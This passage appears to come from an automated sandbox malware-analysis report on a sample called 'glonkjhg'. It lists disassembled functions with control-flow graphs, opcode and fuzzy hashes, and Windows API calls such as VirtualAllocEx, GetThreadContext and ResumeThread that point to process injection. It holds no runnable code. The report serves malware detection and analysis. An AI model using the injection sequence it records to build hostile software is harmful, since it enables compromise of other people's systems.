                                                                                                              • Instruction Fuzzy Hash: 32212772D043098FDB14DFAAC4857EEBBF4EF48264F54842AD519A7241CB78A945CFA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298B778 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 287 298b778-298b7c3 289 298b7d3-298b803 GetThreadContext 287->289 290 298b7c5-298b7d1 287->290 292 298b80c-298b83c 289->292 293 298b805-298b80b 289->293 290->289 293->292
                                                                                                              APIs
                                                                                                              • GetThreadContext.KERNEL32(?,00000000), ref: 0298B7F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ContextThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1591575202-0
                                                                                                              • Opcode ID: 9c0c99b61de797135dff81e35d6daaf036483a16c801a84fc3e36fea1d3e7d5b
                                                                                                              • Instruction ID: e7bf380fe28f0e08630a2b6b585af122bf302e33e525b648bcef5205caa6fa08
                                                                                                              • Opcode Fuzzy Hash: 9c0c99b61de797135dff81e35d6daaf036483a16c801a84fc3e36fea1d3e7d5b
                                                                                                              • Instruction Fuzzy Hash: 90212972D003098FDB10DFAAC4857EEBBF4EF48368F58842AD519A7641CB789945CFA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298C6B8 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 307 298c6b8-298c73c VirtualProtectEx 310 298c73e-298c744 307->310 311 298c745-298c775 307->311 310->311
                                                                                                              APIs
                                                                                                              • VirtualProtectEx.KERNEL32(?,?,?,?,?), ref: 0298C72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: f5c24eb4387aec9fec8c9d8a8c74d66e53e42fb0b7c34c7527dec1b36eaa6875
                                                                                                              • Instruction ID: 2e782d8ddda52357310a58ce1041e4662fdc8e1c68ad84cfdb03dd6b41d45b8f
                                                                                                              • Opcode Fuzzy Hash: f5c24eb4387aec9fec8c9d8a8c74d66e53e42fb0b7c34c7527dec1b36eaa6875
                                                                                                              • Instruction Fuzzy Hash: 3D2147729002099FDB10DFAAC4847EEBBF5FF48324F54842AE519A7250C7799941CFA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 029827D0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 315 29827d0-2982858 VirtualProtect 317 298285a-2982860 315->317 318 2982861-2982882 315->318 317->318
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0298284B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 0a446330f25419ec7a45738e5eabe486585ae5ad0045377e34f0aad6c27838ec
                                                                                                              • Instruction ID: b2f844ca87855c244b8373f67294a1fbe4c1689034645eee61f5012b0e54a186
                                                                                                              • Opcode Fuzzy Hash: 0a446330f25419ec7a45738e5eabe486585ae5ad0045377e34f0aad6c27838ec
                                                                                                              • Instruction Fuzzy Hash: 5A210675D002499FCB10DF9AC584BDEBBF4FB48324F14842AE968A7350D3799545CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0511EA70 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 325 511ea70-511f438 327 511f440-511f46f LoadLibraryExW 325->327 328 511f43a-511f43d 325->328 329 511f471-511f477 327->329 330 511f478-511f495 327->330 328->327 329->330
                                                                                                              APIs
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0511F271,00000800,00000000,00000000), ref: 0511F462
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.535625337.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_5110000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID:
                                                                                                              • API String ID: 1029625771-0
                                                                                                              • Opcode ID: a76a572683e2f10893af230d487a9d6ccbb71d0d96c3a6808d6e40866645ef9c
                                                                                                              • Instruction ID: 5dfb03e541b0157fc99d56422b2f895d805dce7083aa6ec367e424a14897b36b
                                                                                                              • Opcode Fuzzy Hash: a76a572683e2f10893af230d487a9d6ccbb71d0d96c3a6808d6e40866645ef9c
                                                                                                              • Instruction Fuzzy Hash: 231103B69042099FDB14CF9AD444B9EFBF4EB88324F14846AE815B7600C375A945CFA5
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 029827D8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 320 29827d8-2982858 VirtualProtect 322 298285a-2982860 320->322 323 2982861-2982882 320->323 322->323
                                                                                                              APIs
                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?), ref: 0298284B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 544645111-0
                                                                                                              • Opcode ID: 237a1d31f26ddd68905447b31b08c7837cdafc7f791aac9ba793c4a4626c567b
                                                                                                              • Instruction ID: 9b0949697b9267c0db1da134c198e6a38a8b72442587813b05002a5d21beb41c
                                                                                                              • Opcode Fuzzy Hash: 237a1d31f26ddd68905447b31b08c7837cdafc7f791aac9ba793c4a4626c567b
                                                                                                              • Instruction Fuzzy Hash: A12114B2D002499FCB10DF9AC484BDEFBF4FB48320F14802AE868A3250D378A545CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298BE48 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 333 298be48-298bec3 VirtualAllocEx 336 298becc-298bef1 333->336 337 298bec5-298becb 333->337 337->336
                                                                                                              APIs
                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0298BEB6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AllocVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 4275171209-0
                                                                                                              • Opcode ID: f35fe01612dfef7ae3ce0033d999a06da0fdfcd11e0aa6c3924089f0229567c9
                                                                                                              • Instruction ID: 128cd1426fa97a6b35effc5c3b34b2cef7860c558c172d4c3cea24c10c126dca
                                                                                                              • Opcode Fuzzy Hash: f35fe01612dfef7ae3ce0033d999a06da0fdfcd11e0aa6c3924089f0229567c9
                                                                                                              • Instruction Fuzzy Hash: B81137729002099FDB10DFAAC8447DFFBF5EF48324F14841AE515A7250C7799944CFA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0298D110 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 341 298d110-298d17f ResumeThread 344 298d188-298d1ad 341->344 345 298d181-298d187 341->345 345->344
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518606189.0000000002980000.00000040.00000800.00020000.00000000.sdmp, Offset: 02980000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_2980000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ResumeThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 947044025-0
                                                                                                              • Opcode ID: cd81d7212c436b89a2fa466dbb7ebf2dee76414a2763becfae35952d23bfcb29
                                                                                                              • Instruction ID: 82398ca4f085ceecb92a629715bc92dd16ead0d89aec8a99af91e4ab8de9f9a9
                                                                                                              • Opcode Fuzzy Hash: cd81d7212c436b89a2fa466dbb7ebf2dee76414a2763becfae35952d23bfcb29
                                                                                                              • Instruction Fuzzy Hash: 101136B19003488BDB14DFAAD4447EFFBF9AF88224F14842AD519A7250CB79A945CFA0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0511F190 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 349 511f190-511f1d0 350 511f1d2-511f1d5 349->350 351 511f1d8-511f203 GetModuleHandleW 349->351 350->351 352 511f205-511f20b 351->352 353 511f20c-511f220 351->353 352->353
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0511F1F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.535625337.0000000005110000.00000040.00000800.00020000.00000000.sdmp, Offset: 05110000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_5110000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: ef9330b6c9e0cd4243b8a868a9a5da796cbffa78808eebb65917ee9a2d462b2b
                                                                                                              • Instruction ID: 37e93e3f90ba7d3516cbc07bc60ae7c8fc90b7987f4c30ebf74eb06ff33038a7
                                                                                                              • Opcode Fuzzy Hash: ef9330b6c9e0cd4243b8a868a9a5da796cbffa78808eebb65917ee9a2d462b2b
                                                                                                              • Instruction Fuzzy Hash: 9A1113B6C002498FDB10CF9AC444BDEFBF4FB89224F14846AD829B7600C379A546CFA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 012458B0 Relevance: .9, Instructions: 859COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3cbd341786190c5c464b231ee503a52b2fd4322012c997b5a75e0bac5a92d72b
                                                                                                              • Instruction ID: 9ee9734751f0d1681a134a99ae9922967a9807833068d08738c6ace4111d2c40
                                                                                                              • Opcode Fuzzy Hash: 3cbd341786190c5c464b231ee503a52b2fd4322012c997b5a75e0bac5a92d72b
                                                                                                              • Instruction Fuzzy Hash: 4E4295B3D782458BD71ACB1489431C87760FB75338F655EAAC94846603F22FA6278BC9
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01249D08 Relevance: .7, Instructions: 701COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 621952769c14cc4b697c57379bf677bc3e5921ca80a7a5e9d0c7d56e1981e354
                                                                                                              • Instruction ID: e7f8e2778e26a7a1e808cf8182c6293019f78b4aacf3f8f774285215af120175
                                                                                                              • Opcode Fuzzy Hash: 621952769c14cc4b697c57379bf677bc3e5921ca80a7a5e9d0c7d56e1981e354
                                                                                                              • Instruction Fuzzy Hash: 3C524074A0411D9FFB29EBA4C860BEEB7B2EF85304F1180A9D20A6B395DB345D41DF52
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01248F69 Relevance: .5, Instructions: 477COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac8a190fd87a197a1798efeacce834899e0d03b0a3b1bf54ab7424ba8d081ba9
                                                                                                              • Instruction ID: 287074b23f1c515741768354c3cde5353e1b9989e2a0b7987e2bf0a036295759
                                                                                                              • Opcode Fuzzy Hash: ac8a190fd87a197a1798efeacce834899e0d03b0a3b1bf54ab7424ba8d081ba9
                                                                                                              • Instruction Fuzzy Hash: BC125D30A106098FDF29DF69D484A9EBBF2FF49318F158559E6099B3A1D730ED81CB50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124C2A1 Relevance: .4, Instructions: 369COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c717841643206d6be3c93bf8f44407fb9f7a9721d2633654110ae4c95184b3fe
                                                                                                              • Instruction ID: 5d5de44210650e2aa0be465c0e7f3cd92aaec13e36a9837f4bf6b55ffeb1b647
                                                                                                              • Opcode Fuzzy Hash: c717841643206d6be3c93bf8f44407fb9f7a9721d2633654110ae4c95184b3fe
                                                                                                              • Instruction Fuzzy Hash: 14F17F34A21106CFCB1DCF6CC584AAEBBF6FF88340F158554E505AB2A6C770E9A1CB65
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124BD40 Relevance: .4, Instructions: 352COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a46cb66b14753c7d40f686f78f722894f6f99ddf43d5d8059464004299437e22
                                                                                                              • Instruction ID: a7691d5910a75c121e3efa58e439e011946b4bee98e07df21ea16c8d8976f783
                                                                                                              • Opcode Fuzzy Hash: a46cb66b14753c7d40f686f78f722894f6f99ddf43d5d8059464004299437e22
                                                                                                              • Instruction Fuzzy Hash: 2CE1BF35A10249CFCB19CFA8C88499EBFF1FF89304F15856AE6099B262D731E955CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124CE97 Relevance: .3, Instructions: 310COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: aa7fc81cb664d5745b956145522c42f3bad42222566c937b6159a649063d01d5
                                                                                                              • Instruction ID: 1b7f1b3c22248aabc984eaf11b766931a2a22160b8e2e33fa422ddacf612979d
                                                                                                              • Opcode Fuzzy Hash: aa7fc81cb664d5745b956145522c42f3bad42222566c937b6159a649063d01d5
                                                                                                              • Instruction Fuzzy Hash: 7DC11C76A101198FCB19CF9CD984AADBBF6FF98710F1A8455E919AB361CB30EC41CB50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 012476A0 Relevance: .2, Instructions: 227COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c1409820cc36ef1042b5301d15b62b0c1e3dbf3b3eebd4a85d86f9ec6dd0fd3d
                                                                                                              • Instruction ID: 8dac0e7209ea7b0f7aabd8ccc2b8b3d3fb6831de0392088c4b7fad4c79564d52
                                                                                                              • Opcode Fuzzy Hash: c1409820cc36ef1042b5301d15b62b0c1e3dbf3b3eebd4a85d86f9ec6dd0fd3d
                                                                                                              • Instruction Fuzzy Hash: A281C234B50115AFDB09EF64C858BBE3BA6EF88741F848429E616DB381CFB09D51CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124B681 Relevance: .2, Instructions: 226COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a6271a95aadb8ae7cc2193d494ab66a6ff8f29af26f7cd45c9116f7095a22cfa
                                                                                                              • Instruction ID: cccd04e4f2668c9f8a95ce2820f75fa828c91d2984152033ddf7c6d17e31aebf
                                                                                                              • Opcode Fuzzy Hash: a6271a95aadb8ae7cc2193d494ab66a6ff8f29af26f7cd45c9116f7095a22cfa
                                                                                                              • Instruction Fuzzy Hash: 10813931A10606DFC719CF2CC8848AABBB5FF85324B19C6A6D95487352D731FC16CBA1
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124BA41 Relevance: .2, Instructions: 206COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: be686f727a75c599c665bb3d67ec34a7a78f583b76479d9a19189839e2d04430
                                                                                                              • Instruction ID: bafa3fce2c46b81af18fb0baa5144d125b429bf64815ce45a5a456936744bf89
                                                                                                              • Opcode Fuzzy Hash: be686f727a75c599c665bb3d67ec34a7a78f583b76479d9a19189839e2d04430
                                                                                                              • Instruction Fuzzy Hash: CD611870B246068FDB19DB68C4917BEB7F5EF84300F48847AD602DB392DA78DD428791
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01249548 Relevance: .2, Instructions: 201COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b51a39541b9511bcc72bc0c56fc5714be5b4c614e11d60404a5457b3272f32ca
                                                                                                              • Instruction ID: 9684ca73f02f99beb8b30a6d4ccab9de49da1ffd11550a5eaa42558495cec151
                                                                                                              • Opcode Fuzzy Hash: b51a39541b9511bcc72bc0c56fc5714be5b4c614e11d60404a5457b3272f32ca
                                                                                                              • Instruction Fuzzy Hash: 367118347606068FDF19DF29C488AAA7BE6AF4D648B1504A5EA06CB3B1DB70DC81CB50
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247D38 Relevance: .2, Instructions: 182COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 97bebcfcfcbb9d99f37d7baf37d2c8a67b71acd1d8898d49e568c55d89051e72
                                                                                                              • Instruction ID: 02967b7f0c921871db4869696fc6f9f5ca94f46bfe17b7881a64a72f62824859
                                                                                                              • Opcode Fuzzy Hash: 97bebcfcfcbb9d99f37d7baf37d2c8a67b71acd1d8898d49e568c55d89051e72
                                                                                                              • Instruction Fuzzy Hash: 7F616F35B20506CFDB28CF68C48496DBBF6FF89204B1685A9D626EB365D731EC01CB91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 01247998 Relevance: .1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d35e4c01bfb1ed3dcdea93b27ccf4c9fac0f82b5d6cba43105261814ae8defee
                                                                                                              • Instruction ID: 23aea94552d54708ecffdb3172f30c5f79aeb193418d3c6abfdc9d40b350dfc1
                                                                                                              • Opcode Fuzzy Hash: d35e4c01bfb1ed3dcdea93b27ccf4c9fac0f82b5d6cba43105261814ae8defee
                                                                                                              • Instruction Fuzzy Hash: 3B4103307142118FEB19AF7884A4B7E7BE2AFC4244F488469D256CB386EF74CD068792
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124B8A0 Relevance: .1, Instructions: 146COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0267b969a0282985d06a7f1a59c6b4b77560956bdeb88ca9c39f42f31585b40c
                                                                                                              • Instruction ID: f76231e777a64c328423de419426930739036ac6b43d8f7cccdab56f1d20d5e5
                                                                                                              • Opcode Fuzzy Hash: 0267b969a0282985d06a7f1a59c6b4b77560956bdeb88ca9c39f42f31585b40c
                                                                                                              • Instruction Fuzzy Hash: 8851B0357102499FEB15DF68C844BAABBE6EFC9350F04C066EA09CB352DB70CC018B92
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124FD10 Relevance: .1, Instructions: 143COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 90bbd6c7efc4674f58f3cd42581d7ba265eb8c2afd889c62de3d8794a97e84c7
                                                                                                              • Instruction ID: ae26f0abd01408e6482882ac875ee49727857861cc86e12351a3c62e691435e3
                                                                                                              • Opcode Fuzzy Hash: 90bbd6c7efc4674f58f3cd42581d7ba265eb8c2afd889c62de3d8794a97e84c7
                                                                                                              • Instruction Fuzzy Hash: DB41E131B042008FC799AB39C85066A7BE2EF86205B5589BED015CB393DB75EC0ACB52
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124F8E8 Relevance: .1, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0bb7f2842477148183f1c53ed7e3c6bee3c85b85c03fb569866cd1249b261c43
                                                                                                              • Instruction ID: 1245ae370f1b9800c8cbc17f11aafad2c2a72f75716307b720fd344df597d394
                                                                                                              • Opcode Fuzzy Hash: 0bb7f2842477148183f1c53ed7e3c6bee3c85b85c03fb569866cd1249b261c43
                                                                                                              • Instruction Fuzzy Hash: 59510A71E042198FDB18DFAAC9447EEBBF2BF88300F14C06AD508AB295D7744A85CF91
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124BFBB Relevance: .1, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 78ce3b0204fca0a7568cec840e91af1dd8dc091924aeb170b9a4153fd8e4919a
                                                                                                              • Instruction ID: 4781c6ef7a979489bba8588d3b51d42c1259c4ba5baea92512e771438464770e
                                                                                                              • Opcode Fuzzy Hash: 78ce3b0204fca0a7568cec840e91af1dd8dc091924aeb170b9a4153fd8e4919a
                                                                                                              • Instruction Fuzzy Hash: 7841E631A11249DFCF1ACFACC844AAEBFB1EF4A350F048056EA199F255D375E964CB90
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Function 0124CBC8 Relevance: .1, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.518434449.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_1240000_glonkjhg.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
